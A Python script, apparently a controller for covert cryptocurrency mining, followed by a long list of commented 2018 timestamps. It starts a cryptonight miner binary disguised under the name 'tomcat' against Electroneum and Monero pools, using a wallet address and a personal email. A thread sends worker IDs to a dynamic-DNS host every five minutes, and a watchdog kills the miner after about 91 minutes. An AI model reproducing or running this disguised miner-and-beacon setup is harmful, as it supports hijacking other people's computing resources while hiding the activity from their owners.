import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:06.540481
#2018-02-17 17:12:06.602879
#2018-02-17 19:00:09.523831
#2018-02-17 20:47:07.179326
#2018-02-17 22:34:05.125956
#2018-02-18 00:18:04.045885
#2018-02-18 02:09:04.109337
#2018-02-18 03:56:03.932527
#2018-02-18 05:44:03.593243
#2018-02-18 07:36:01.940099
#2018-02-18 09:23:05.086200
#2018-02-18 11:09:03.610601
#2018-02-18 12:56:05.777146
#2018-02-18 14:44:02.132942
#2018-02-18 16:32:05.899191
#2018-02-18 18:21:07.179683
#2018-02-18 20:07:05.544911
#2018-02-18 21:54:01.971071
#2018-02-18 23:43:04.793795
#2018-02-19 01:29:03.733103
#2018-02-19 03:17:07.010947
#2018-02-19 05:02:03.952378
#2018-02-19 06:47:01.856665
#2018-02-19 08:37:04.128514
#2018-02-19 10:26:04.813033
#2018-02-19 12:14:02.126720
#2018-02-19 14:01:02.140653
#2018-02-19 15:50:03.082655
#2018-02-19 17:38:06.840837
#2018-02-19 19:25:09.025855
#2018-02-19 21:11:04.481751
#2018-02-19 22:59:07.545666
#2018-02-20 00:42:05.627477
#2018-02-20 02:32:04.283411
#2018-02-20 04:21:03.488296
#2018-02-20 06:05:09.454682
#2018-02-20 07:50:06.485369
#2018-02-20 09:35:07.959497
#2018-02-20 11:19:07.672991
#2018-02-20 13:06:07.584055
#2018-02-20 14:49:06.495660
#2018-02-20 16:32:10.784111
#2018-02-20 18:18:09.623148
#2018-02-20 20:09:06.623511
#2018-02-20 21:56:05.407905
#2018-02-20 23:36:03.630547
#2018-02-21 01:19:06.027687
#2018-02-21 03:06:04.312183
#2018-02-21 04:53:02.075370
#2018-02-21 06:41:05.320113
#2018-02-21 08:28:05.065131
#2018-02-21 10:13:07.090933
#2018-02-21 12:01:04.487386
#2018-02-21 13:51:07.293474
#2018-02-21 15:37:02.245952
#2018-02-21 17:27:01.672436
#2018-02-21 19:14:02.127337
#2018-02-21 21:02:04.171381
#2018-02-21 22:48:04.016359
#2018-02-22 00:37:01.353085
#2018-02-22 02:24:06.121579
#2018-02-22 04:11:06.987652
#2018-02-22 05:56:04.431272
#2018-02-22 07:42:04.219080
#2018-02-22 09:29:06.879286
#2018-02-22 11:16:05.602251
#2018-02-22 13:03:06.100012
#2018-02-22 14:50:05.456659
#2018-02-22 16:35:11.332085
#2018-02-22 18:21:09.169834
#2018-02-22 20:28:05.399438
#2018-02-22 22:15:09.805796
#2018-02-23 00:01:08.965828
#2018-02-23 01:48:02.212290
#2018-02-23 03:36:05.794818
#2018-02-23 05:20:10.425261
#2018-02-23 07:05:08.804844
#2018-02-23 08:54:07.342538
#2018-02-23 11:13:02.088817
#2018-02-23 13:07:05.747607
#2018-02-23 14:51:07.019324
#2018-02-23 16:40:01.596765
#2018-02-23 18:26:05.810590
#2018-02-23 20:10:11.060275
#2018-02-23 21:59:02.487651
#2018-02-23 23:47:04.649154
#2018-02-24 01:39:04.485369
#2018-02-24 03:28:07.974840
#2018-02-24 05:14:01.458859
#2018-02-24 07:02:05.633590
#2018-02-24 08:38:03.394260
#2018-02-24 10:09:07.196349
#2018-02-24 11:54:01.611845
#2018-02-24 13:21:04.966828
#2018-02-24 14:52:04.084705
#2018-02-24 16:26:03.796945
#2018-02-24 18:00:10.656030
#2018-02-24 19:27:04.810148
#2018-02-24 21:03:07.165985
#2018-02-24 23:06:03.824116
#2018-02-25 03:13:05.346914
#2018-02-25 06:47:06.941085